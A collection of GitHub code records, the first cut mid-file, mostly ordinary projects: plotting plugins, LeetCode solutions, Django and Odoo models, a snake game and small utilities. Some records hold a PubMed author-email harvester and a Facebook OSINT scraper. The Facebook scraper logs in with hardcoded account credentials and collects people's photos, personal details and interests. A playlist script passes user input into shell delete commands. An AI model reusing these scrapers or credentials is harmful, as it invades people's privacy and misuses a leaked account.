import PlotDataAxesMpl, PluginAnimationCommonMpl\n\nif TYPE_CHECKING:\n    from matplotlib.figure import Figure  # type: ignore\n    from matplotlib.lines import Line2D  # type: ignore\n    from nxscli.idata import PluginQueueData\n\n\n###############################################################################\n# Class: Animation1\n###############################################################################\n\n\nclass Animation1(PluginAnimationCommonMpl):\n    \"\"\"Infinity animation with x axis extension.\"\"\"\n\n    def __init__(\n        self,\n        fig: \"Figure\",\n        pdata: PlotDataAxesMpl,\n        qdata: \"PluginQueueData\",\n        write: str,\n    ) -> None:\n        \"\"\"Initialize an animation1 handler.\n\n        :param fig: matplotlib Figure\n        :param pdata: axes handler\n        :param qdata: stream queue handler\n        :param write: write path\n        \"\"\"\n        PluginAnimationCommonMpl.__init__(self, fig, pdata, qdata, write)\n\n    def _animation_update(\n        self, frame: tuple[list[Any], list[Any]], pdata: PlotDataAxesMpl\n    ) -> \"Line2D\":  # pragma: no cover\n        \"\"\"Update an animation with dynamic scaling.\"\"\"\n        # update sample\n        pdata.xdata_extend(frame[0])\n        pdata.ydata_extend(frame[1])\n\n        # update y scale\n        self.yscale_extend(frame[1], pdata)\n\n        # update x scale\n        self.xscale_extend(frame[0], pdata)\n\n        # set new data\n        i = 0\n        for ln in pdata.lns:\n            ln.set_data(pdata.xdata[i], pdata.ydata[i])\n            i += 1\n\n        return pdata.lns\n\n\n###############################################################################\n# Class: PluginAnimation1\n###############################################################################\n\n\nclass PluginAnimation1(IPluginAnimation):\n    \"\"\"Infinity animation with x axis extension.\"\"\"\n\n    def __init__(self) -> None:\n        \"\"\"Initialize an animation1 plugin.\"\"\"\n        IPluginAnimation.__init__(self)\n\n    def _start(\n        self,\n        fig: \"Figure\",\n        pdata: PlotDataAxesMpl,\n        qdata: \"PluginQueueData\",\n        kwargs: Any,\n    ) -> PluginAnimationCommonMpl:\n        \"\"\"Start an animation1 plugin.\"\"\"\n        return Animation1(fig, pdata, qdata, kwargs[\"write\"])\n","repo_name":"railab/nxscli-mpl","sub_path":"src/nxscli_mpl/plugins/animation1.py","file_name":"animation1.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"26333092382","text":"from ListNode import *\nfrom typing import *\n\n\nclass Solution:\n    def detectCycle(self, head: Optional[ListNode]) -> Optional[ListNode]:\n        slow = head\n        fast = head\n\n        while fast and fast.next:\n            fast = fast.next.next\n            slow = slow.next\n            if fast == slow:\n                break\n\n        if not fast or not fast.next:\n            return None\n\n        slow = head\n        while slow != fast:\n            fast = fast.next\n            slow = slow.next\n        return slow\n","repo_name":"zxw254470434/PythonStudy","sub_path":"Leetcode/142.py","file_name":"142.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"19834940264","text":"# Python 3.6\n# This scraper extracts data like emails from a dynamic page, using selenium and saves it to csv\n\nimport re\nimport csv\nimport selenium\nfrom time import sleep\nfrom selenium import webdriver, common\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.proxy import *\n\ndef findEmail(driver): # This function 
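# The 142.py record above relies on a ListNode module that is not part of
# this dataset. A self-contained version of the same Floyd cycle detection,
# with an assumed single-link node definition and a quick sanity check:
class ListNode:
    def __init__(self, val=0):
        self.val = val
        self.next = None


def detect_cycle(head):
    slow = fast = head
    while fast and fast.next:
        fast = fast.next.next
        slow = slow.next
        if fast is slow:
            # Meeting point found: restarting one pointer from the head
            # makes both meet again at the first node of the cycle.
            slow = head
            while slow is not fast:
                slow = slow.next
                fast = fast.next
            return slow
    return None


if __name__ == '__main__':
    a, b, c = ListNode(1), ListNode(2), ListNode(3)
    a.next, b.next, c.next = b, c, b      # 1 -> 2 -> 3 -> back to 2
    assert detect_cycle(a) is b
    c.next = None                         # break the cycle
    assert detect_cycle(a) is None
    print('ok')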
searches for the email on the page\n\ttry:\n\t\texpand_button = driver.find_element_by_id(\"toggle-authors\")\n\t\texpand_button.click()\n\t\temail_text = driver.find_element_by_id(\"full-view-expanded-authors\").text\n\t\treturn email_text # Returning the text from the tag, which contains the emails\n\texcept Exception as e: # The website has different layouts so we adjust accordingly\n\t\tprint(e)\n\t\texpand_button = driver.find_element_by_id(\"toggle-authors\")\n\t\texpand_button.click()\n\t\temail_text = driver.find_element_by_css_selector(\"li[data-affiliation-id='affiliation-1']\").text\n\t\treturn email_text\n\t\t\n\ndef clickNextPage(driver):\n\t# Finds the button that goes to the next page and clicks it\n\tnext_button = driver.find_element_by_css_selector(\"span[class='arrow']\")\n\tActionChains(driver).move_to_element(next_button).click(next_button).perform()\n\ndef main(): # Runs the whole program\n\tsearch = 'brca1'\n\tpattern = re.compile(r'[\\w\\.-]+@[\\w\\.]+') # Th pattern that will extract the emails from the page\n\t# For the Selenium webdriver, the actual scraper\n\turl = f'https://pubmed.ncbi.nlm.nih.gov/?term={search}&sort=date' # URL to the specific page\n\topts = Options()\n\n\t# proxy = \"167.99.93.53:8080\" # If you have a working proxy, put it in here(optional)\n\t# opts.add_argument(f'--proxy-server={proxy}')\n\n\t# opts.set_headless()\n\t# assert opts.headless # Operating in headless mode. Currently not working\n\twith webdriver.Chrome(options=opts) as driver:\n\t\tdriver.get(url)\n\t\tsearch_result = driver.find_element_by_class_name('docsum-title')\n\t\tsearch_result.click()\n\n\t\twith open('emails.csv', 'a', newline='') as csvfile:\n\t\t\twriter_object = csv.writer(csvfile, delimiter=',')\n\t\t\twhile True: # or: for i in range(n): where n is the number of pages you want scraped\n\t\t\t\tsleep(1) # To let the CPU rest a bit\n\t\t\t\ttry:\n\t\t\t\t\temail_string = findEmail(driver)\n\t\t\t\t\t# Extracting the email from the string if there is any string at all\n\t\t\t\t\temails_found = pattern.findall(email_string) if email_string else None\n\t\t\t\t\tprint('emails found:', emails_found)\n\t\t\t\t\t# Cleaning the emails from possible dots at the end\n\t\t\t\t\temail_list = list(map(lambda x: x.strip('.'), emails_found)) if emails_found else None\n\t\t\t\t\tif email_list: # If we extracted any emails\n\t\t\t\t\t\twriter_object.writerow(email_list) # Writing to the csv\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tprint('Caught Error:', e)\n\t\t\t\tfinally:\n\t\t\t\t\tclickNextPage(driver) # Even if there was an error, move to the next page\n\nmain()\n\n","repo_name":"Sory-Noroc/Web-Scrapers","sub_path":"Pubmed Scraper.py","file_name":"Pubmed Scraper.py","file_ext":"py","file_size_in_byte":2977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38444927672","text":"# The task was taken from this video\n# https://www.youtube.com/watch?v=Ifwf3DBN1sc\n# We want to spend all money and buy 2 different flavors\n\nmenu = {'Strawberry': 2,\n 'Blueberry': 7,\n 'Nutella': 13,\n 'Vanilla': 5,\n 'Banana': 4,\n 'Bublegum': 13,\n 'Chocolate': 5}\n\n\ndef buy_ace_cream(menu, total_money: int) -> list:\n difference_hash = {}\n\n # Create a hashmap with diff in the price\n for i, (item, price) in enumerate(menu.items()):\n diff = total_money - price\n difference_hash.setdefault(diff, []).append((item, i))\n\n results = set() # we need to take only unique combinations of flavors\n\n for i, (item, price) in 
enumerate(menu.items()):\n        diff = total_money - price\n        difference_hash.setdefault(diff, []).append((item, i))\n\n    results = set()  # we need to take only unique combinations of flavors\n\n    for i, (item, price) in enumerate(menu.items()):\n        for j, pos in difference_hash.setdefault(price, []):\n            if j != item:  # check if it is not the same flavour\n                results.add((min(i, pos), max(i, pos)))\n\n    return list(results)\n\n\nexamples = [10, 13, 18, 4, 7, 101]\nfor total_money in examples:\n    result = buy_ace_cream(menu, total_money)\n    print('${0:4} -> {1}'.format(total_money, result))\n","repo_name":"TimurNurlygayanov/test-tasks-example","sub_path":"algs/ice_cream.py","file_name":"ice_cream.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
{"seq_id":"38994513510","text":"from django.db import models\n\n\nclass Journal(models.Model):\n    students = models.PositiveSmallIntegerField(\n        'Количество студентов',\n    )\n    lessons = models.PositiveSmallIntegerField(\n        'Количество занятий'\n    )\n\n    class Meta:\n        verbose_name = 'Журнал'\n        verbose_name_plural = 'Журналы'\n\n\nclass CellImage(models.Model):\n    SYMBOL_CHOICE = (\n        ('0', '0'),\n        ('1', '1'),\n        ('2', '2'),\n        ('3', '3'),\n        ('4', '4'),\n        ('5', '5'),\n        ('н', 'н')\n    )\n    image = models.ImageField('Изображение')\n    image_array = models.JSONField()\n    symbol = models.CharField(\n        'Символ',\n        choices=SYMBOL_CHOICE,\n        max_length=1,\n        blank=True\n    )\n\n    class Meta:\n        verbose_name = 'Изображение ячейки (сырые данные)'\n        verbose_name_plural = 'Изображения ячеек (сырые данные)'\n\n","repo_name":"AlexStr94/data_science_diplom","sub_path":"diplom/symbols_analyzer/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"73596881193","text":"from json import dumps, loads\r\nfrom os import listdir, chdir, system, name\r\n\r\ndef menu():\r\n    print(\"1_ Show all playlists\")\r\n    print(\"2_ Create playlist\")\r\n    print(\"3_ Modify playlist\")\r\n    print(\"4_ Delete playlist\")\r\n    print(\"5_ Exit\")\r\n\r\ndef printList(list):\r\n    s = 0\r\n    for i in list:\r\n        print(str(s) + \"_ \" + i)\r\n        s += 1\r\n\r\ndef createFile(n):\r\n    with open(f\"{n}.json\", \"w\") as file:\r\n        file.write('{}')\r\n\r\ndef deleteFile(n):\r\n    if(name == \"nt\"):\r\n        system(f\"del {n}.json\")\r\n    else:\r\n        system(f\"rm {n}.json\")\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n    chdir(\"../resources/playlists\")\r\n\r\n    playlists = listdir(\".\")\r\n\r\n    while(True):\r\n        menu()\r\n\r\n        choice = int(input(\"\\n[i]Input your choice: \"))\r\n\r\n        if(choice == 1):\r\n            playlists = listdir(\".\")\r\n            printList(playlists)\r\n\r\n        elif(choice == 2):\r\n            n = str(input(\"[i]Input the playlist name (ex. shakira_songs): \"))\r\n            createFile(n)\r\n\r\n        elif(choice == 3):\r\n            n = str(input(\"[i]Input the playlist name (ex. shakira_songs): \"))\r\n            contents = {}\r\n\r\n            with open(f\"{n}.json\", \"r\", encoding = \"utf-8\") as file:\r\n                contents = loads(file.read())\r\n            \r\n            while(True):\r\n                print(\"\\n\")\r\n                print(\"1_ Change playlist name\")\r\n                print(\"2_ Add song\")\r\n                print(\"3_ Show songs\")\r\n                print(\"4_ Remove song\")\r\n                print(\"5_ Save changes\")\r\n\r\n                choice2 = int(input(\"\\n[i]Input your choice: \"))\r\n\r\n                if(choice2 == 1):\r\n                    nn = str(input(\"[i]Input the new name (ex. not_shakira:songs): \"))\r\n                    n = nn  # adopt the new name (takes effect when the playlist is saved)\r\n\r\n                elif(choice2 == 2):\r\n                    songN = str(input(\"[i]Input the song name with file extension (ex. 
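# buy_ace_cream above builds a full price-difference table and then rescans
# the whole menu. Since the goal is just a pair of two different flavors per
# budget, the classic one-pass two-sum complement lookup is enough (a sketch
# reusing the record's menu; it reports one pair per matching price pair,
# not every duplicate combination):
from typing import Dict, List, Tuple


def buy_ice_cream(menu: Dict[str, int], total_money: int) -> List[Tuple[int, int]]:
    prices = list(menu.values())
    seen: Dict[int, int] = {}      # price -> first index seen with that price
    pairs = set()
    for i, price in enumerate(prices):
        complement = total_money - price
        if complement in seen:
            pairs.add((seen[complement], i))   # seen index is always smaller
        seen.setdefault(price, i)
    return sorted(pairs)


if __name__ == '__main__':
    menu = {'Strawberry': 2, 'Blueberry': 7, 'Nutella': 13, 'Vanilla': 5,
            'Banana': 4, 'Bublegum': 13, 'Chocolate': 5}
    for money in (10, 13, 18, 4, 7, 101):
        print('${0:4} -> {1}'.format(money, buy_ice_cream(menu, money)))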
say_goodbye.mp3): \"))\r\n contents[len(contents)] = songN\r\n\r\n elif(choice2 == 3):\r\n s = 0\r\n for k in contents:\r\n print(str(s) + \"_ \" + contents[k])\r\n s += 1\r\n\r\n elif(choice2 == 4):\r\n songN = str(input(\"[i]Input the song name with file extension (ex. say_goodbye.mp3): \"))\r\n d = str(input(f\"[i]Are you sure you want to delete {songN} from {n}? (y/n): \"))\r\n\r\n if(d == 'y'): \r\n res = None\r\n for sub in contents:\r\n if contents[sub] == songN:\r\n res = sub\r\n \r\n if(res == None):\r\n print(\"[-]Song not found\")\r\n else:\r\n del contents[res]\r\n \r\n else:\r\n print(\"[-]Canceled\")\r\n\r\n elif(choice2 == 5):\r\n with open(f\"{n}.json\", \"w\", encoding = \"utf-8\") as file:\r\n file.write(dumps(contents))\r\n\r\n break\r\n\r\n else:\r\n print(\"[-]Invalid option\")\r\n\r\n elif(choice == 4):\r\n n = str(input(\"[i]Input the playlist name (ex. shakira_songs): \"))\r\n d = str(input(f\"[i]Are you sure you want to delete {n}? (y/n): \"))\r\n \r\n if(d == 'y'): deleteFile(n)\r\n else: print(\"[-]Canceled\")\r\n\r\n elif(choice == 5):\r\n break\r\n\r\n else:\r\n print(\"[-]Invalid choice\")\r\n\r\n print(\"\\n\")","repo_name":"BanNeophiliatic/web_player","sub_path":"scripts/playlist.py","file_name":"playlist.py","file_ext":"py","file_size_in_byte":3578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26203531223","text":"import pymongo as mongo\nfrom dataentry import DataEntry\n\n\nclass DataMan:\n def __init__(self, url, database_name, collection_name):\n self.url = url\n self.database_name = database_name\n self.collection_name = collection_name\n\n self.client = mongo.MongoClient(url)\n self.database = self.client[database_name]\n self.collection = self.database[collection_name]\n\n def read_all(self):\n for entry_dict in self.collection.find():\n yield DataEntry(**entry_dict)\n\n def write(self, entry):\n self.collection.insert_one(dict(entry))\n","repo_name":"kwshi/dsnsm","sub_path":"dsnsm/dataman.py","file_name":"dataman.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16245813057","text":"\"\"\"Two Sum in Binary Search Tree.\"\"\"\n\n\nclass Node:\n def __init__(self, data: int) -> None:\n self.data = data\n self.left = None\n self.right = None\n\n\nclass BSTIterator:\n def __init__(self, root: Node, is_reversed: bool) -> None:\n self.stack: list[Node] = []\n self.reverse: bool = is_reversed\n self.push_all(root)\n\n def push_all(self, node: Node) -> None:\n while node is not None:\n self.stack.append(node)\n if self.reverse:\n node = node.right\n else:\n node = node.left\n\n def has_next(self):\n return len(self.stack) != 0\n\n def next(self) -> int:\n if self.has_next():\n node: Node = self.stack.pop()\n if not self.reverse:\n self.push_all(node.right)\n else:\n self.push_all(node.left)\n return node.data\n return 0\n\n\ndef tow_sum(root: Node, key: int) -> bool:\n if root is None:\n return False\n left = BSTIterator(root=root, is_reversed=False)\n right = BSTIterator(root=root, is_reversed=True)\n i: int = left.next()\n j: int = right.next()\n while i < j:\n if i + j == key:\n return True\n elif (i + j) < key:\n i = left.next()\n else:\n j = right.next()\n\n return False\n\n\ndef insert_node(root: Node, data: int) -> Node:\n \"\"\"Iterative approach.\"\"\"\n if root is None:\n return Node(data)\n\n cur: Node = root\n while True:\n if cur.data <= data:\n # insert in the right\n if 
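A brief usage sketch for the `DataMan` wrapper that just ended above; the connection URL, database, and collection names are placeholders, not from the source:

```python
# read_all() is a generator, so documents become DataEntry objects lazily
dm = DataMan("mongodb://localhost:27017", "example_db", "example_collection")
for entry in dm.read_all():
    print(entry)
```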
cur.right:\n cur = cur.right\n else:\n cur.right = Node(data)\n break\n else:\n # insert in the left subtree\n if cur.left:\n cur = cur.left\n else:\n cur.left = Node(data)\n break\n\n return root\n\n\ndef in_order(root: Node) -> None:\n if root is None:\n return\n in_order(root.left)\n print(root.data, end=\"->\")\n in_order(root.right)\n\n\ndef build_tree(elements: list[int]) -> Node:\n root = Node(elements[0])\n for i in range(1, len(elements)):\n insert_node(root=root, data=elements[i])\n\n return root\n\n\nif __name__ == \"__main__\":\n elements: list[int] = [8, 5, 1, 7, 10, 12]\n root: Node = build_tree(elements=elements)\n in_order(root)\n print(\"None\")\n key: int = 14\n print(tow_sum(root=root, key=key))\n","repo_name":"kamrul-pu/problem-solving","sub_path":"data_structure/tree/bst_two_sum.py","file_name":"bst_two_sum.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3580122911","text":"from googleSearch import getFbProfilesUrls, getNameAdnSurname\nimport requests\nimport time\nfrom selenium.webdriver import Chrome\nfrom selenium.webdriver.chrome.options import Options\nfrom bs4 import BeautifulSoup\nfrom Person import Person\n\n\ndef checkData(s1,s2):\n nasm=getNameAdnSurname(s1)\n if s2.find(nasm.get('name')) is not -1 and s2.find(nasm.get('surname')) is not -1:\n return True\n else:\n return False\n\n\nclass FaceBookSearcher:\n def __init__(self,name):\n self.people=[]\n self.links=getFbProfilesUrls(name)\n self.goal=name\n\n def ifInclude(self, url):\n for i in self.links:\n if i is url:\n return True\n return False\n\n def getNameFromFb(self):\n for j in self.links:\n raw_html=requests.get(j)\n cont=raw_html.content\n soup=BeautifulSoup(cont,'html.parser')\n body=soup.body\n elem=body.find_all('a', {'href': j })\n ifAdded=False\n for i in elem:\n person=Person()\n person.setName(i.text)\n person.facebook['url']=j\n self.people.append(person)\n ifAdded=True\n if ifAdded:\n raw_html = requests.get(j)\n cont = raw_html.content\n soup = BeautifulSoup(cont, 'html.parser')\n body = soup.body\n elem = body.find_all('ul', {'class': 'uiList profile-friends _4kg'})\n for o in elem:\n for k in o:\n el = k.find_all('div', {'class': 'profileFriendsText'})\n for f in el:\n za=f.find_all('a')\n for x in za:\n if checkData(self.goal, x.text):\n if self.ifInclude(x['href']) is False and x['href'].find('sk-sk') is -1 and \\\n x['href'].find('pl-pl') is -1:\n self.links.append(x['href'])\n self.links=list(set(self.links))\n\n\n\n def searchData(self):\n opts = Options()\n opts.add_argument('--headless')\n\n browser = Chrome('chromedriver.exe', chrome_options=opts)\n browser.get('https://facebook.com')\n form=browser.find_element_by_id('email')\n form.send_keys('vojtekk94@o2.pl')\n form=browser.find_element_by_id('pass')\n form.send_keys('kochampalictrawke')\n browser.find_element_by_id('loginbutton').click()\n for i in self.people:\n browser.get(i.facebook['url'])\n req=browser.page_source\n soup=BeautifulSoup(req,'html.parser')\n photo_url=''\n photo_desc=''\n elem=soup.find('a',{'class' : '_2nlw _2nlv'})\n i.name=elem.text\n elem=soup.find('img', {'class': '_11kf img'})\n if elem is not None:\n photo_url=elem['src']\n photo_desc=elem['alt']\n i.facebook['profile_photo']=(photo_url,photo_desc)\n elems=soup.find_all('img',{'class' : 'scaledImageFitWidth img'})\n i.facebook['photos_urls']=[]\n for e in elems:\n i.facebook['photos_urls'].append(e['src'])\n i.facebook['favourites']={}\n 
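The paired `BSTIterator`s in the two-sum record solve the problem in O(h) extra space by walking the tree from both ends. For contrast, a common O(n)-space alternative (a sketch, not in the source) is a single inorder walk with a complement set:

```python
def two_sum_with_set(root, key):
    seen = set()

    def dfs(node):
        if node is None:
            return False
        if dfs(node.left):
            return True
        if key - node.data in seen:   # complement already visited
            return True
        seen.add(node.data)
        return dfs(node.right)

    return dfs(root)
```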
keys=soup.find_all('div',{'class' : 'labelContainer'})\n m=soup.find_all('div', {'class' : 'mediaPortrait'})\n browser.get('{}/{}'.format(i.facebook['url'], 'about'))\n cont=browser.page_source\n soup=BeautifulSoup(cont,'html.parser')\n infos=soup.find_all('div',{'class' : '_c24 _50f4'})\n i.facebook['data']=[]\n for el in infos:\n val=soup.find('a')\n i.facebook['data'].append(el.text)\n interests=soup.find_all('div' , {'class' : '_30f'})\n i.facebook['interests']={}\n for it in interests:\n t=it.find_all('span', { 'class' : '_3sz'})\n if t:\n for g in t:\n i.facebook['interests'][g.text]=[]\n p=it.find_all('a', {'class' : '_gx7'})\n for z in p:\n i.facebook['interests'][g.text]=z.text\n\n browser.close()\n\n\n\n","repo_name":"wpadala420/osintPeopleSearcher","sub_path":"FacebookParse.py","file_name":"FacebookParse.py","file_ext":"py","file_size_in_byte":4345,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"2510683823","text":"from abc import ABC, abstractmethod\nimport json\n\nCONFIG_FILE_NAME = \"config.json\"\n\n\nclass AbstractExtractParser(ABC):\n def __init__(self, file_name):\n # read config file\n json_file = open(CONFIG_FILE_NAME)\n self.configs = json.load(json_file)\n json_file.close()\n\n self.all_debits, self.all_credits = self.parse_file(file_name)\n self.residents_payment, self.weird_credits = self.discover_resident_payments()\n self.defined_bills, self.weird_debits = self.discover_defined_bills()\n\n super().__init__()\n\n @abstractmethod\n def parse_file(self, file_name):\n \"\"\"\n Parse file and generate debit and credit objects\n :param file_name: name of account extract file\n :return debits: all debits in account\n credits: all credits in account\n \"\"\"\n pass\n\n def discover_resident_payments(self):\n \"\"\"\n Discover known resident payments using config file\n :return: resident_payments: dictionary with residents and found payment\n weird_credits: dictionary with weird credits\n \"\"\"\n\n residents_payments = {}\n weird_credits = self.all_credits.copy()\n\n # iterate through credits keys and values\n for cDescription, cValue in self.all_credits.items():\n # iterate through residents\n for resident in self.configs[\"residents\"]:\n\n # parse who pays values\n pay_methods = resident[\"who_pays\"].split(',')\n for pay_method in pay_methods:\n # if any pay_method in cDescription\n if pay_method in cDescription:\n parsed_payment = cValue#float(str(cValue).strip().\n # replace(\".\", \"\").\n # replace(\",\", \".\"))\n # allow residents two perform two payments in a month\n if resident[\"name\"] in residents_payments:\n residents_payments[resident[\"name\"]] += parsed_payment\n else:\n residents_payments[resident[\"name\"]] = parsed_payment\n\n # save credit to remove later\n weird_credits.pop(cDescription)\n\n return residents_payments, weird_credits\n\n def discover_defined_bills(self):\n \"\"\"\n Discover known bills using config file\n :return: defined_bills: dictionary with defined bills\n weird_debits: dictionary with weird debits\n \"\"\"\n\n defined_debits = {}\n weird_debits = self.all_debits.copy()\n\n # iterate through debits keys and values\n for dDescription, dValue in self.all_debits.items():\n # iterate through registered bills\n for bill in self.configs[\"house_bills\"]:\n # parse bill names\n bill_names = bill[\"extr_name\"].split(',')\n for bill_name in bill_names:\n # if any bill_name in dDescription\n if bill_name in dDescription:\n parsed_bill = dValue#float(str(dValue).strip().\n # 
replace(\".\", \"\").\n # replace(\",\", \".\"))\n # allow more than one bill type\n if bill[\"name\"] in defined_debits:\n defined_debits[bill[\"name\"]] += -parsed_bill\n else:\n defined_debits[bill[\"name\"]] = -parsed_bill\n\n # save debit to remove later\n weird_debits.pop(dDescription)\n\n return defined_debits, weird_debits\n","repo_name":"marcosscarpim/rep_bills_calculator","sub_path":"AbstractExtractParser.py","file_name":"AbstractExtractParser.py","file_ext":"py","file_size_in_byte":3790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29154412902","text":"#this is the first prototype for snake game environment to configure manual control in the game\r\nimport random\r\nimport pygame\r\nimport time\r\n\r\n\r\nwhite = (255,255,255)\r\nblack = (0,0,0)\r\nred = (255,0,0)\r\n\r\nblock_size = 20\r\nfps = 15\r\ndisplay_width = 800\r\ndisplay_height = 600\r\n\r\nclock = pygame.time.Clock()\r\n\r\npygame.init()\r\n\r\nfont = pygame.font.SysFont(\"Helvatica\",25)\r\n\r\n\r\n\r\n\r\ngameDisplay = pygame.display.set_mode((display_width,display_height))\r\npygame.display.set_caption(\"snake game environment 1\")\r\n\r\n\r\n#pygame.display.update()\r\ndef score(snake_length):\r\n score_text = str(snake_length-1)\r\n screen_text = font.render(score_text,True,black)\r\n gameDisplay.blit(screen_text,[1,1])\r\ndef snake(snake_list):\r\n for XnY in snake_list:\r\n pygame.draw.rect(gameDisplay,black,[XnY[0],XnY[1],block_size,block_size])\r\n\r\n\r\ndef messege_to_screen(msg,color):\r\n text_to_screen = font.render(msg,True,color)\r\n gameDisplay.blit(text_to_screen,[display_width/2,display_height/2])\r\n\r\n\r\ndef GameLoop():\r\n gameExit = False\r\n lead_x = display_width/2\r\n lead_y = display_height/2\r\n lead_x_change = 0\r\n lead_y_change = 0\r\n snake_list = []\r\n snake_length = 1\r\n randAppleX = round(random.randrange(0,display_width-block_size) / block_size)*block_size\r\n randAppleY = round(random.randrange(0,display_height-block_size) / block_size)*block_size\r\n gameOver = False\r\n\r\n while not gameExit:\r\n\r\n while gameOver:\r\n messege_to_screen(\"you loose press p to play again or q to quit\",red)\r\n pygame.display.update()\r\n for event in pygame.event.get():\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_p:\r\n GameLoop()\r\n elif event.key == pygame.K_q:\r\n gameOver = False\r\n gameExit = True\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n gameExit = True\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_LEFT and lead_x_change == 0:\r\n lead_x_change = -block_size\r\n lead_y_change = 0\r\n elif event.key == pygame.K_RIGHT and lead_x_change == 0:\r\n lead_x_change = block_size\r\n lead_y_change = 0\r\n elif event.key == pygame.K_UP and lead_y_change == 0:\r\n lead_y_change = -block_size\r\n lead_x_change = 0\r\n elif event.key == pygame.K_DOWN and lead_y_change == 0:\r\n lead_y_change = block_size\r\n lead_x_change = 0\r\n #print(event.type)\r\n lead_x += lead_x_change\r\n lead_y += lead_y_change\r\n if lead_x >= display_width or lead_y >= display_height or lead_x < 0 or lead_y <0:\r\n gameOver = True\r\n gameDisplay.fill(white)\r\n score(snake_length)\r\n snake_list.append([lead_x,lead_y])\r\n if len(snake_list) > snake_length:\r\n del snake_list[0]\r\n snake(snake_list)\r\n for XnY in snake_list[:-1]:\r\n if XnY == snake_list[snake_length-1]:\r\n gameOver = True\r\n break\r\n 
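`AbstractExtractParser` above defers only `parse_file` to subclasses. A minimal concrete subclass could look like this; the two-column CSV layout (description, signed amount) is an assumption for illustration:

```python
import csv

class CsvExtractParser(AbstractExtractParser):
    def parse_file(self, file_name):
        # credits are positive amounts, debits negative, keyed by description
        debits, credits = {}, {}
        with open(file_name, newline='') as f:
            for description, value in csv.reader(f):
                amount = float(value)
                (credits if amount > 0 else debits)[description] = amount
        return debits, credits
```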
pygame.draw.rect(gameDisplay,red,[randAppleX,randAppleY,block_size,block_size])\r\n #gameDisplay.fill(red,rect = [200,200,20,20])\r\n pygame.display.update()\r\n if lead_x == randAppleX and lead_y == randAppleY:\r\n snake_length += 1\r\n randAppleX = round(random.randrange(0,display_width-block_size) / block_size)*block_size\r\n randAppleY = round(random.randrange(0,display_height-block_size) / block_size)*block_size\r\n\r\n clock.tick(fps)\r\n\r\n pygame.quit()\r\nGameLoop()\r\nquit()\r\n","repo_name":"subhamroy007/snakeAI","sub_path":"env_prototype1.py","file_name":"env_prototype1.py","file_ext":"py","file_size_in_byte":3797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41704591851","text":"from openerp import tools\nfrom openerp.osv import fields,osv\nimport openerp.addons.decimal_precision as dp\nimport time\nimport logging\nfrom openerp.tools.translate import _\n\n_logger = logging.getLogger(__name__)\n\nclass sale_move_analysis(osv.osv):\n\t_name \t\t= \"vit.move.analysis\"\n\t_columns \t= {\n\t\t'categ_id' \t\t\t: fields.many2one('product.category', 'Category'),\n\t\t'model_id' \t\t\t: fields.many2one('vit.master.type', 'Model'),\n\t\t'product_id'\t\t: fields.many2one('product.product', 'Product'),\n\t\t'onhand_qty' \t: fields.integer('OnHand Qty'),\n\t\t'in_qty'\t\t\t: fields.integer('Total In Qty'),\n\t\t'out_qty' \t\t\t: fields.integer('Total Out Qty'),\n\t\t'soh_qty' \t\t\t: fields.integer('Total SOH Qty'),\n\t\t'out_qty_cust' \t\t: fields.integer('Out Qty Customer'),\n\t\t'in_qty_qc' \t\t: fields.integer('In Qty QC'),\n\t\t'year'\t\t\t\t: fields.char('Year'),\n\t\t'month'\t\t\t\t: fields.char('Month'),\n\t\t'day'\t\t\t\t: fields.char('Day'),\n\t\t'location_id' \t\t: fields.many2one('stock.location','Location'),\n\t}\n\n\nclass sale_move_analysis_onhand(osv.osv):\n\t_name \t\t= \"vit.move.analysis.onhand\"\n\t_columns \t= {\n\t\t'categ_id' \t\t\t: fields.many2one('product.category', 'Category'),\n\t\t'model_id' \t\t\t: fields.many2one('vit.master.type', 'Model'),\n\t\t'product_id'\t\t: fields.many2one('product.product', 'Product'),\n\t\t'onhand_qty' \t: fields.integer('OnHand Qty'),\n\t\t'date' \t\t\t\t: fields.char(\"Date\"),\n\t\t'location_id' \t\t: fields.many2one('stock.location','Location'),\n\t}\t\t\t\t\t","repo_name":"akhdaniel/addons","sub_path":"mutif_all_vit_addons/vit_move_analysis/vit_move_analysis.py","file_name":"vit_move_analysis.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"34898006841","text":"\"\"\"\r\n MimDB project.\r\n Class for working with lists.\r\n\"\"\"\r\n\r\n# Imports\r\nfrom .data import database as d\r\nfrom .data_control import DataControl\r\n# End\r\n\r\nclass Lists:\r\n dataControl = DataControl()\r\n def __init__(self):\r\n self.dataControl = DataControl()\r\n\r\n def madd(self, key: str, values: list, column: int=0):\r\n '''\r\n Add values to a key.\r\n\r\n value must be a str list\r\n '''\r\n try:\r\n for i in values:\r\n d[key][column].append(i)\r\n 